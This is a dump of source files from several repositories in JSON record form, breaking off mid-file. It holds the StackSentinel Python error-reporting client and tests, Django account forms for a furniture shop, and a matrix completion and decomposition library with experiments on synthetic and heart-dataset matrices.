machine_info)\n\n def test_generate_request(self):\n client = StackSentinelClient('', '', 'unittest')\n (request, payload) = client._generate_request(\n environment='unitest',\n error_message='TEST ERROR MESSAGE',\n error_type='TEST ERROR TYPE',\n return_feedback_urls=True,\n state={\n 'test': range(100)\n },\n tags=['cheese'],\n traceback=[]\n )\n payload_parsed = json.loads(payload)\n self.failUnless('return_feedback_urls' in payload)\n\n def test_handle_exception(self):\n client = StackSentinelClient('', '', 'unittest')\n try:\n x = 1 / 0\n except:\n send_error_args = client.handle_exception(dry_run=True)\n if not isinstance(send_error_args, dict):\n self.fail('Did not return dict from handle_exception with dry_run enabled.')\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.593727707862854,
"alphanum_fraction": 0.5968460440635681,
"avg_line_length": 34.97435760498047,
"blob_id": "08e3d505c088736e8edc11db427e14b3dd062211",
"content_id": "c5bd5aee2c5bd7228f366b71eccf1ffd417c89a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11224,
"license_type": "permissive",
"max_line_length": 212,
"num_lines": 312,
"path": "/StackSentinel/__init__.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStackSentinel Python Client\n===========================\nUse this client to integrate StackSentinel (www.stacksentinel.com) into your Python projects. You can also use\nplatform-specific StackSentinel clients, such as the stacksentinel-flask client:\n\n>>> import StackSentinel\n>>> stack_sentinel_client = StackSentinel.StackSentinelClient(\n... account_token='-- YOUR ACCOUNT TOKEN --',\n... project_token='-- YOUR PROJECT TOKEN --',\n... environment='development-experiment', tags=['documentation-test'])\n>>> print stack_sentinel_client\n<StackSentinel.StackSentinelClient object at 0x10bcfbb90>\n>>> try:\n... oops = 1 / 0\n... except:\n... stack_sentinel_client.handle_exception()\n...\n\nThat's all it takes. The information about the exception, along with platform and machine information, is gathered\nup and sent to Stack Sentinel.\n\nFor WSGI applications, you can use the WSGI Middleware included with this project:\n\n>>> app = StackSentinelMiddleware(app, stack_sentinel_client)\n\nCompatibility\n=============\nThis StackSentinel Python Client is compatible with Python 2.7 and 3.x and Stack Sentinel API v1.\n\nLicense\n=======\nCopyright 2015 Stack Sentinel. All Rights Reserved.\n\nThis software is licensed under the Apache License, version 2.0.\n\nSee LICENSE for full details.\n\nGetting Help\n============\nEmail [email protected] with your questions.\n\"\"\"\nimport json\nimport os\nimport sys\n\n#\n# Some sandboxed environments do not have socket\ntry:\n import socket\nexcept:\n socket = None\n\n#\n# Some sandboxed environments do not have platform\ntry:\n import platform\nexcept:\n platform = None\n\n#\n# Python2/3\ntry:\n from urllib2 import urlopen, Request, HTTPError\nexcept ImportError:\n from urllib.request import urlopen, Request, HTTPError\n\n\nclass StackSentinelError(ValueError):\n \"\"\"\n Exception raised when there is an error communicating with backend or generating request for backend.\n \"\"\"\n pass\n\n\nclass StackSentinelClient(object):\n \"\"\"\n Client to send exceptions to StackSentinel. See in particular the handle_exception method, which can be called\n within an except block. See also the send_error method, which at a lower level generates an appropriate payload\n for the StackSentinel API.\n \"\"\"\n USER_AGENT = 'STACK SENTINEL PYTHON CLIENT'\n\n def __init__(self, account_token, project_token, environment, tags=None,\n endpoint=\"https://api.stacksentinel.com/api/v1/insert\"):\n \"\"\"\n\n :param account_token: Your account token, as supplied by StackSentinel\n :param project_token: Your project token, as supplied by StackSentinel\n :param environment: The environment of the project (eg, \"production\", \"devel\", etc)\n :param tags: Any tags you want associated with *all* errors sent using this client.\n :param endpoint: API endpoint. Defaults to StackSentinel backend.\n \"\"\"\n self.account_token = account_token\n self.project_token = project_token\n self.endpoint = endpoint\n self.environment = environment\n if tags:\n self.tags = tags\n else:\n self.tags = []\n\n @staticmethod\n def _serialize_object(obj):\n \"\"\"\n When the state of an exception includes something that we can't pickle, show something useful instead.\n \"\"\"\n try:\n return repr(obj)\n except:\n return '<Cannot Be Serialized>'\n\n def handle_exception(self, exc_info=None, state=None, tags=None, return_feedback_urls=False,\n dry_run=False):\n \"\"\"\n Call this method from within a try/except clause to generate a call to Stack Sentinel.\n\n :param exc_info: Return value of sys.exc_info(). If you pass None, handle_exception will call sys.exc_info() itself\n :param state: Dictionary of state information associated with the error. This could be form data, cookie data, whatnot. NOTE: sys and machine are added to this dictionary if they are not already included.\n :param tags: Any string tags you want associated with the exception report.\n :param return_feedback_urls: If True, Stack Sentinel will return feedback URLs you can present to the user for extra debugging information.\n :param dry_run: If True, method will not actively send in error information to API. Instead, it will return a request object and payload. Used in unittests.\n\n \"\"\"\n if not exc_info:\n exc_info = sys.exc_info()\n if exc_info is None:\n raise StackSentinelError(\"handle_exception called outside of exception handler\")\n\n (etype, value, tb) = exc_info\n try:\n msg = value.args[0]\n except:\n msg = repr(value)\n\n if not isinstance(tags, list):\n tags = [tags]\n\n limit = None\n\n new_tb = []\n n = 0\n\n while tb is not None and (limit is None or n < limit):\n f = tb.tb_frame\n lineno = tb.tb_lineno\n co = f.f_code\n filename = co.co_filename\n name = co.co_name\n tb = tb.tb_next\n n = n + 1\n\n new_tb.append({'line': lineno, 'module': filename, 'method': name})\n\n if state is None:\n state = {}\n\n if 'sys' not in state:\n try:\n state['sys'] = self._get_sys_info()\n except Exception as e:\n state['sys'] = '<Unable to get sys: %r>' % e\n if 'machine' not in state:\n try:\n state['machine'] = self._get_machine_info()\n except Exception as e:\n state['machine'] = '<Unable to get machine: %e>' % e\n\n if tags is None:\n tags = []\n\n # The joy of Unicode\n if sys.version_info.major > 2:\n error_type = str(etype.__name__)\n error_message = str(value)\n else:\n error_type = unicode(etype.__name__)\n error_message = unicode(value)\n\n send_error_args = dict(error_type=error_type,\n error_message=error_message,\n traceback=new_tb,\n environment=self.environment,\n state=state,\n tags=self.tags + tags,\n return_feedback_urls=return_feedback_urls)\n if dry_run:\n return send_error_args\n else:\n return self.send_error(**send_error_args)\n\n def _get_sys_info(self):\n sys_info = {\n 'version': sys.version,\n 'version_info': sys.version_info,\n 'path': sys.path,\n 'platform': sys.platform\n }\n return sys_info\n\n def _get_machine_info(self):\n machine = {}\n if socket:\n try:\n machine['hostname'] = socket.gethostname()\n except Exception as e:\n machine['hostname'] = '<Could not determine: %r>' % (e,)\n else:\n machine['hostname'] = \"<socket module not available>\"\n machine['environ'] = dict(os.environ)\n if platform:\n machine['platform'] = platform.uname()\n machine['node'] = platform.node()\n machine['libc_ver'] = platform.libc_ver()\n machine['version'] = platform.version()\n machine['dist'] = platform.dist()\n return machine\n\n def send_error(self, error_type, error_message, traceback, environment, state, tags=None,\n return_feedback_urls=False):\n \"\"\"\n Sends error payload to Stack Sentinel API, returning a parsed JSON response. (Parsed as in,\n converted into Python dict/list objects)\n\n :param error_type: Type of error generated. (Eg, \"TypeError\")\n :param error_message: Message of error generated (Eg, \"cannot concatenate 'str' and 'int' objects\")\n :param traceback: List of dictionaries. Each dictionary should contain, \"line\", \"method\", and \"module\" keys.\n :param environment: Environment the error occurred in (eg, \"devel\")_\n :param state: State of the application when the error happened. Could contain form data, cookies, etc.\n :param tags: Arbitrary tags you want associated with the error. list.\n :param return_feedback_urls: If True, return payload will offer URLs to send users to collect additional feedback for debugging.\n :return: Parsed return value from Stack Sentinel API\n \"\"\"\n\n (request, payload) = self._generate_request(environment, error_message, error_type, return_feedback_urls,\n state, tags, traceback)\n try:\n response = urlopen(request)\n except HTTPError as e:\n if e.code == 400:\n raise StackSentinelError(e.read())\n else:\n raise\n\n if sys.version_info.major > 2:\n text_response = response.read().decode(response.headers.get_content_charset() or 'utf8')\n else:\n encoding = response.headers.get('content-type', '').split('charset=')[-1].strip()\n if encoding:\n text_response = response.read().decode('utf8', 'replace')\n else:\n text_response = response.read().decode(encoding)\n\n return json.loads(text_response)\n\n def _generate_request(self, environment, error_message, error_type, return_feedback_urls, state, tags, traceback):\n payload = json.dumps(dict(\n account_token=self.account_token,\n project_token=self.project_token,\n return_feedback_urls=return_feedback_urls,\n errors=[dict(\n error_type=error_type,\n error_message=error_message,\n environment=environment,\n traceback=traceback,\n state=state,\n tags=tags or []\n )]\n ), default=self._serialize_object)\n request = Request(self.endpoint, data=payload.encode('utf8'), headers={\n 'Accept-Charset': 'utf-8',\n \"Content-Type\": \"application/x-www-form-urlencoded ; charset=UTF-8\",\n 'User-Agent': self.USER_AGENT})\n return (request, payload)\n\n\nclass StackSentinelMiddleware(object):\n \"\"\"\n Stack Sentinel middleware client. As easy as this:\n\n >>> client = StackSentinelClient(...)\n >>> app = StackSentinelMiddleware(app, client)\n \"\"\"\n def __init__(self, app, client):\n \"\"\"\n :param app: WSGI application object\n :param client: Instance of StackSentinel\n \"\"\"\n self.app = app\n\n self.client = client\n\n def __call__(self, environ, start_response):\n result = None\n\n try:\n result = self.app(environ, start_response)\n except Exception:\n self.client.handle_exception(state={'wsgi_environ': environ})\n raise\n\n try:\n if result is not None:\n for i in result:\n yield i\n except Exception:\n self.client.handle_exception(state={'wsgi_environ': environ})\n raise\n\n finally:\n if hasattr(result, 'close'):\n result.close()\n"
},
{
"alpha_fraction": 0.581993579864502,
"alphanum_fraction": 0.5927116870880127,
"avg_line_length": 34.88461685180664,
"blob_id": "4ef81f25a3e6ab0651d160127b538ddd754180e1",
"content_id": "a9785ed480dced797751ced40f1db8e1a458eb2d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 26,
"path": "/setup.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nversion = '1.2'\nurl = 'https://github.com/StackSentinel/stacksentinel-python'\n\nsetup(\n name='stacksentinel',\n description='Stack Sentinel client and WSGI middleware',\n keywords='stack sentinel stacksentinel exception tracking api',\n version=version,\n author=\"Jeri MgCuckin\",\n author_email=\"[email protected]\",\n url=url,\n test_suite='tests',\n packages=find_packages(exclude=['tests']),\n classifiers=[\"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\"\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n ],\n license='Apache License (2.0)'\n)\n"
}
] | 4 |
Zinfir/server | https://github.com/Zinfir/server | fb0a7a3d79ff98b7da916a5f5459596605baa3be | b5bcd3133aa574e8a682166c33098144ef97a646 | a1eeb33d1fd516ef60e3dc1a36661673b0a305ce | refs/heads/master | 2020-04-15T00:26:48.479839 | 2019-01-19T05:45:49 | 2019-01-19T05:50:11 | 164,240,355 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8064516186714172,
"alphanum_fraction": 0.8064516186714172,
"avg_line_length": 14.5,
"blob_id": "d232f6e05c99bd8b17fa61ddeef0845adac98e3c",
"content_id": "08a8666d123a052e28a164f4a0a0e2adb62c3180",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Zinfir/server",
"src_encoding": "UTF-8",
"text": "# server\nfurniture shop server\n"
},
{
"alpha_fraction": 0.5194085240364075,
"alphanum_fraction": 0.5268022418022156,
"avg_line_length": 25.19354820251465,
"blob_id": "68957ae1fac623f69d336622bf46e26991054dfe",
"content_id": "85bf6e97cc45f86db05c1795d11fb1f183b4d98e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1623,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 62,
"path": "/accounts/forms.py",
"repo_name": "Zinfir/server",
"src_encoding": "UTF-8",
"text": "from django import forms\nimport random, hashlib\nfrom accounts.models import Account\n\n\nclass Account_Form(forms.ModelForm):\n class Meta:\n model = Account\n fields = [\n 'username',\n 'password',\n 'first_name',\n 'last_name',\n 'email',\n 'phone',\n 'avatar'\n ]\n widgets = {\n 'password': forms.PasswordInput(attrs={'class': 'field_password'}),\n 'email': forms.EmailInput(attrs={'class': 'field_email'}),\n }\n\n\nclass Registration_Form(forms.Form):\n username = forms.CharField(\n label='Login', max_length=150,\n widget=forms.widgets.TextInput(\n attrs={'class': 'field_username'}\n )\n )\n email = forms.CharField(\n max_length=150, required=True,\n widget=forms.widgets.EmailInput(\n attrs={'class': 'field_email'}\n )\n )\n password = forms.CharField(\n max_length=250,\n widget=forms.widgets.PasswordInput(\n attrs={'class': 'field_password'}\n )\n )\n password_confirm = forms.CharField(\n max_length=250,\n widget=forms.widgets.PasswordInput(\n attrs={'class': 'field_password'}\n )\n )\n\n\nclass Registration_Model_Form(forms.ModelForm):\n class Meta:\n model = Account\n fields = [\n 'username',\n 'password',\n 'email',\n ]\n widgets = {\n 'password': forms.PasswordInput(attrs={'class': 'field_password'}),\n 'email': forms.EmailInput(attrs={'class': 'field_email'}),\n }"
}
] | 2 |
rahulmadbhavi/matrix-completion-1 | https://github.com/rahulmadbhavi/matrix-completion-1 | 23e402eef43694088600bf73e7db81cbf22ad4b9 | bbaf0c1851077de47fff4570751d58bdb8a03f59 | 42a95534ceffb12b7540d0d10d5aaadbf66f51a9 | refs/heads/master | 2021-12-03T03:01:08.844055 | 2013-07-05T12:26:04 | 2013-07-05T12:26:04 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5593979954719543,
"alphanum_fraction": 0.5856547951698303,
"avg_line_length": 31.87368392944336,
"blob_id": "e79e44519936241c1c780041fa26ac003b0dcf6d",
"content_id": "19e70af2d01a02b13a5ff2e98609b7ed531d4212",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3123,
"license_type": "permissive",
"max_line_length": 261,
"num_lines": 95,
"path": "/matrixdecomposition.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 15 12:17:57 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\n\n\"\"\"\nDecomposes an optionally incomplete matrix, into two components, one low rank, and one sparse. It takes the following arguments:\n Y: The matrix to decompose. It is supposed that Y is equal to TH + GA + W, where TH is an approximately low rank matrix, GA is a sparse \"spiky\" matrix, and W is noise. A full matrix needs to be given, but some parts can be ignored, as specified by the mask.\n Mask: A mask can be given to treat the matrix as incomplete. It must be of the same dimentions as Y. It must have 0 or False in the positions where Y is incomplete, 1 or True elsewhere. Defaults to None.\n lambda_d: regularization paramater for the low rank TH matrix.\n mu_d: regularization parameter for the sparse GA matrix. Use higher values if no spikes are expected.\n alpha: parameter that limits the maximum element of the low rank TH matrix. Bigger matrices will need a bigger alpha values.\n\nIt will return TH and GA.\n\"\"\"\ndef matrix_decomposition(Y, Mask=None, lambda_d=0.025, mu_d=0.005, alpha=20, max_iterations=1000):\n # default value\n if Mask == None: \n Mask = Y*0+1\n t = 1.0\n TH = GA = TH_last = GA_last = Y * 0.0 # theta and gamma\n for k in range(0, max_iterations):\n t_last = t\n #print (t_last - 1)/t\n t = ( 1.0 + sp.sqrt(1 + 4 * t**2) )/ 2.0\n #print (t_last - 1)/t\n Z = TH + (t_last - 1)/t*(TH-TH_last)\n N = GA + (t_last - 1)/t*(GA-GA_last)\n lambd = 0.5 # TODO: check\n f = ((Z+N) - Y) * 0.5\n first = Z - f*Mask\n second = N - f*Mask\n TH_last, GA_last = TH, GA\n TH, GA = prox_g([first, second], lambd, lambda_d, mu_d, alpha)\n if sp.sqrt(((TH - TH_last)**2).sum()) + sp.sqrt(((GA - GA_last)**2).sum()) < 1e-2:\n print k, \"iterations\"\n break\n return [TH, GA]\n\ndef prox_g(grad, lambd, lambda_d, mu_d, alpha):\n N, Z = grad\n \n X = N\n P = Q = N*0.0\n for i in range(0, 500): # TODO: how many iterations?\n Y = prox1(X+P, lambda_d, lambd)\n P = X + P - Y\n X_last = X\n X = prox2(Y+Q, alpha)\n Q = Y + Q - X\n if sp.sqrt(((X - X_last)**2).sum()) < 1e-4:\n break\n V = X\n \n # soft thresholding\n W = soft_threshold(Z, mu_d*lambd)\n return [V, W]\n\n# projection of nuclear norm\ndef prox1(X, lambda_d, lambd):\n U, s, Vh = sp.linalg.svd(X)\n d1, d2 = X.shape\n E = sp.linalg.diagsvd(s, d1, d2) # sigma \n S = soft_threshold(E, lambda_d*lambd)\n return U.dot(S.dot(Vh))\n\n# projection in Q\ndef prox2(X, alpha):\n limit = alpha / sp.sqrt(sp.array(X.shape).prod())\n X = sp.minimum(X, limit)\n X = sp.maximum(X, -limit)\n return X\n\ndef soft_threshold(X, s):\n return (X-s)*(X>s) + (X+s)*(X<-s)\n\n#sp.random.seed(0)\n#size = 30\n#TH = low_rank(size, 3)\n#GA = spiky(size)\n#Y = TH + GA\n#X = selection(size, 0.)\n#A, B = matrix_decomposition(Y*X, Mask=X)\n#print X[1, :]\n#print TH[1, :]\n#print A[1, :]\n#print GA[1, :]\n#print B[1, :]\n"
},
{
"alpha_fraction": 0.7297096252441406,
"alphanum_fraction": 0.7386448383331299,
"avg_line_length": 73.55555725097656,
"blob_id": "cd685b499166c262c647dddfb7f1f18c9336d383",
"content_id": "d13c0aba0f6bef2b49147b5acad31dfc69d47fff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1343,
"license_type": "permissive",
"max_line_length": 265,
"num_lines": 18,
"path": "/README.md",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "Matrix Completion\n=================\n\nThis code implements a matrix completion and decomposition algorithm, based on [this][1] paper.\n\n[1]:http://arxiv.org/abs/1102.4807\n\nThe main method you will want to use is `matrix_decomposition()` which decomposes an optionally incomplete matrix, into two components, one low rank, and one sparse. It takes the following arguments:\n\n* `Y`: the matrix to decompose. `Y` is assumed to be equal to `TH + GA + W`, where `TH` is an approximately low rank matrix, `GA` is a sparse \"spiky\" matrix, and `W` is noise. A full matrix needs to be given, but some parts can be ignored, as specified by the mask.\n* `Mask`: a mask can be given to treat the matrix as incomplete. It must be of the same dimentions as `Y`. It must have `0` or `False` in the positions where `Y` is incomplete, `1` or `True` elsewhere. Defaults to `None`.\n* `lambda_d`: regularization paramater for the low rank `TH` matrix.\n* `mu_d`: regularization parameter for the sparse `GA` matrix. Use higher values if no spikes are expected.\n* `alpha`: parameter that limits the maximum element of the low rank TH matrix. Bigger matrices will need bigger alpha` values.\n\nThe method will **return** `TH` and `GA`.\n\nAdditionally the code contains some methods and classes to generate synthetic matrices and to test the decomposition in various ways.\n\n"
},
{
"alpha_fraction": 0.5345501899719238,
"alphanum_fraction": 0.571056067943573,
"avg_line_length": 23.74193572998047,
"blob_id": "47ec3c77566bb257727f058c264168bc561d9139",
"content_id": "338d9e08fdc961790aea02e2bf78c0e3facc9bd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 767,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 31,
"path": "/unittest_matrixgeneration.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 11:18:10 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport unittest\nimport matrix_generation as mg\n\nimport scipy as sp\nimport numpy.random as random\nimport numpy.linalg\n\nclass TestMatrixGeneration(unittest.TestCase):\n def test_ortonormal(self):\n n = 15\n I = sp.identity(n)\n for _ in range(0, 100):\n M = mg.ortonormal(n)\n self.assertTrue( (M.dot(M.T) - I <= mg.delta()).all() )\n \n def test_low_rank(self):\n for _ in range(0, 100):\n rank = random.randint(3, 8)\n M = mg.low_rank(15, rank)\n actual_rank = numpy.linalg.matrix_rank(M, mg.delta() * 4)\n self.assertEqual(actual_rank, rank)\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5776000022888184,
"alphanum_fraction": 0.5960000157356262,
"avg_line_length": 23.509803771972656,
"blob_id": "308712e467ce587f983b4034d4220b90a92b7a64",
"content_id": "6e8ded89f7cf741deea817da6d789cc1f255f3da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1250,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 51,
"path": "/matrixgeneration.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 11:09:39 2012\n\n@author: Fela Winkelmolen\n\nSome methods to generate test matrixes\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg as linalg\nimport numpy.random as random\n#import load\n\ndef delta():\n return sp.finfo(float).eps * 16\n\ndef ortonormal(m):\n I = sp.identity(m)\n \n # eigenvectors of a random symmetric m by m matrix\n A = sp.rand(m, m)\n #print '---------------------------'\n #print A.sum()\n S = A * A.T\n _, P = linalg.eigh(S)\n #print P\n #print P.dot(P.T)\n # check if really ortonormal\n if ((P.dot(P.T) - I > delta()).any()):\n return ortonormal(m) # try again\n return P\n\ndef low_rank(m, rank):\n diag = sp.concatenate((sp.rand(rank)*5+1, sp.zeros(m-rank)))\n E = sp.diag(diag)\n return ortonormal(m).dot(E).dot(ortonormal(m).T)\n\ndef spiky(m, spikes=None, avg=1.0, sigma=None):\n # substitute None with default values\n spikes = spikes or m\n sigma = sigma or avg/6.0\n \n GA = sp.zeros((m, m))\n r = random.randint(0, m, spikes) # row indexes of spikes\n c = random.randint(0, m, spikes) # column indexes of spikes\n GA[[r, c]] = sigma * random.randn(spikes) + avg\n return GA\n\ndef selection(m, perc):\n return sp.rand(m, m) >= perc\n"
},
{
"alpha_fraction": 0.5082097053527832,
"alphanum_fraction": 0.5363007187843323,
"avg_line_length": 30.372671127319336,
"blob_id": "35b9b05f98692d7ebc1ee2517b06a8ef084c7014",
"content_id": "da615e54f6f4c88181b491a855b289c7775ddb11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5055,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 161,
"path": "/test_real_data.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 09:19:57 2012\n\n@author: Fela Winkelmolen\n\nTests using the data from http://archive.ics.uci.edu/ml/datasets/SPECTF+Heart\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\nimport matrixdecomposition as md\n\n\n#############################################################\nclass Experiment:\n def __init__(self, **opt):\n # default values\n self.filename = opt.pop('filename', None) or 'SMALL'\n self.seed = opt.pop('seed', None) or 0\n self.holes = opt.pop('holes', None)\n # do not overwrite if holes is set to .0!\n if self.holes == None:\n self.holes = 0.2 # holes percentage\n self.completion = opt.pop('completion', None) or 'matrix'\n \n self.options = opt\n self.generate_matrix()\n\n def run(self):\n self.generate_mask()\n TH, GA = self.TH, self.GA\n Y, Mask = self.Y, self.mask\n A = self.matrix_completion()\n \n n = (1-Mask).sum()\n diff = (TH-A)*(1-Mask)\n sqerr = (diff**2).sum()\n if n != 0:\n sqerr /= n\n return sqrt(sqerr)\n \n def matrix_completion(self):\n if self.completion == 'matrix':\n res, _ = md.matrix_decomposition(self.Y, self.mask, **self.options)\n elif self.completion == 'mean':\n means = self.Y.mean(0) # means along the column axis\n # calculate the true means along the column axis\n # using only the values in the mask\n rows, cols = self.Y.shape\n means = sp.zeros(cols)\n # calculate the true means along the column axis\n # using only the values in the mask\n for c in range(cols):\n sum = 0.0\n n = 0\n for r in range(rows):\n if self.mask[r][c]:\n sum += self.Y[r][c]\n n += 1\n if n == 0:\n means[c] = 0\n else:\n means[c] = sum/n\n \n res = double(self.Y)\n for r in range(rows):\n for c in range(cols):\n if not self.mask[r][c]:\n res[r][c] = means[c]\n return res\n \n \n # called once after initialization\n def generate_matrix(self):\n filename = 'data/' + self.filename + '.train'\n self.TH, _ = self.load_data(filename)\n self.GA = self.TH * 0\n self.Y = self.TH + self.GA\n \n def generate_mask(self, holes=None):\n if holes != None:\n self.holes = holes\n rows, cols = self.GA.shape\n if self.seed != None:\n seed(self.seed)\n self.mask = rand(rows,cols) > self.holes\n \n @staticmethod\n def load_data(filename):\n M = [[int(i) for i in line.split(',')] for line in open(filename)]\n M = sp.array(M)\n y = M[:, 0]\n X = M[:, range(1, M.shape[1])]\n return (X, y)\n\ndef holes_experiment(**opt):\n n = opt.pop('steps', None) or 5\n runs = opt.pop('runs', None) or 1\n label = opt.pop('label', None)\n #opt['mu_d'] = 0\n y = sp.array(range(n+1)) / float(n)\n x = []\n for holes in y:\n print '.',\n acc = []\n e = Experiment(**opt)\n for i in range(runs):\n e.generate_mask(holes)\n acc.append(e.run())\n x.append(sp.array(acc).mean())\n plot(y, x, label=label)\n legend(loc=0)\n\ndef param_experiment(param_name, params, **opt):\n label = opt.pop('label', None) or param_name\n scale = opt.pop('scale', None) or 'linear'\n x = []\n for p in params:\n print '.',\n opt[param_name] = p\n e = Experiment(**opt)\n x.append(e.run())\n xscale(scale)\n plot(params, x, label=label)\n legend(loc=0)\n\n\n\n# exponential range\ndef exp_range(minval=0.001, maxval=100, steps=10):\n min_exp = sp.log(minval)\n max_exp = sp.log(maxval)\n return sp.exp(sp.linspace(min_exp, max_exp, num=steps))\n\n# test for different completion percentage\n# more runs are made to get an estimate of the variance\n# and completion using the mean of the column is used for comparison\ndef experiment1():\n for s in range(5):\n holes_experiment(steps=10, alpha=100000, completion='matrix', seed=s)\n \n #holes_experiment(steps=10, alpha=100000, mu_d=1, completion='matrix', label='mu_d=1')\n \n holes_experiment(steps=20, runs=5, alpha=100000, completion='mean', seed=0, label='mean')\n\n# test different values of mu_d\ndef experiment2():\n params = exp_range(0.00001, 100, 30)\n param_experiment('mu_d', params, alpha=100000, label='0.2')\n figure()\n params = exp_range(0.00001, 100, 30)\n param_experiment('mu_d', params, alpha=100000, holes=0.6, label='0.6')\n\n# test different values of lambda_d\ndef experiment3():\n params = exp_range(0.005, 0.2,)\n param_experiment('lambda_d', params, alpha=100000, label='0.2')\n figure()\n param_experiment('lambda_d', params, alpha=100000, holes=0.6, label='0.2')\n "
},
{
"alpha_fraction": 0.4760563373565674,
"alphanum_fraction": 0.5338028073310852,
"avg_line_length": 22.66666603088379,
"blob_id": "8a15f9bc77693dc47641b60839b9be3841f77b00",
"content_id": "3eca74f7b66493ad73bbabadd0a5dbbb0c790d17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 710,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 30,
"path": "/unittest_matrixdecomposition.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 11:18:35 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport unittest\nimport matrixdecomposition as md\n\nimport scipy as sp\n\nclass TestMatrixGeneration(unittest.TestCase):\n def test_decomposition_id(self):\n # testing using the identity map\n TH = sp.array([[1, 2, 3], [2, 4, 6]])\n GA = sp.array([[0, 0, 0], [0, 100, 0]])\n \n Y = TH + GA\n \n A, B = md.matrix_decomposition(Y, lambda_d=0.1, mu_d=0.08, alpha=1000)\n \n self.assertLess(abs(TH-A).sum(), 1.0, \"\")\n self.assertLess(abs(TH-A).max(), 0.2, \"\")\n \n self.assertLess(abs(GA-A).sum() < 1.0, \"\")\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.53110271692276,
"alphanum_fraction": 0.5457115769386292,
"avg_line_length": 28.082191467285156,
"blob_id": "a59185aa8c311c0de6f2c87c17b1ae8e12d7b16e",
"content_id": "50dd7c578b97b873ef2e617d2fd4cbec63993580",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2122,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 73,
"path": "/test_synthetic_matrixes.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 09:19:57 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\nimport matrixdecomposition as md\n\nclass Tester:\n def __init__(self):\n sp.random.seed(0)\n self._decomposition_args = {}\n self.verbose = True\n self._generate_matrix()\n \n def set_decomposition_options(self, **kwargs):\n self._decomposition_args = kwargs\n \n \"\"\" sets the following instance variables:\n * _Y is the input matrix of the decomposition algorithm\n * _Mask is the mask of _Y equal to True in the positions \n where _Y is observed\n * _TH is the first component of _Y, which we want to recover\n * _GA is the other component\"\"\"\n def _generate_matrix(self):\n pass\n \n def comparative_test(self):\n TH, GA = self._TH, self._GA\n Y, Mask, args = self._Y, self._Mask, self._decomposition_args\n A, B = md.matrix_decomposition(Y, Mask, **args)\n if self.verbose == True:\n print GA[1, :]\n print B[1, :]\n print Mask[1, :]\n print TH[1, :]\n print A[1, :]\n \n error = ((TH - A)**2).sum() / TH.size\n print \"mean square error:\", error\n error2 = ((TH - Y*Mask)**2).sum() / TH.size\n print \"mse for naive solution:\", error2\n print \"improvement:\", error2/error, \"times\"\n\nclass SintheticMatrixTester(Tester):\n def __init__(self):\n # default values\n self._size = 30\n self._rank = 3\n self._holes = 